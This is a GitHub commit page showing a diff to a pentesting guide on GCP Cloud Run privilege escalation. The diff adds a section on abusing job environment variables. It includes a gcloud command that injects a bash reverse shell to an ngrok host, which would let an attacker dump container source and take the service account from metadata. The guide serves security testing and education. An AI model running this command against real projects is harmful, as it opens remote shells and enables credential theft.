Skip to content

Commit

Permalink
GITBOOK-629: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Jun 19, 2024
1 parent 31dca55 commit cf10948
Showing 1 changed file with 11 additions and 1 deletion.
12 changes: 11 additions & 1 deletion pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -78,7 +78,17 @@ gcloud beta run jobs update hacked \
--execute-now
```

### `run.jobs.setIamPolicy`
### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)

Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: 

{% code overflow="wrap" %}
```bash
gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
```
{% endcode %}

### `çrun.jobs.setIamPolicy`

Give yourself the previous permissions over Cloud Jobs.

Expand Down

0 comments on commit cf10948

Please sign in to comment.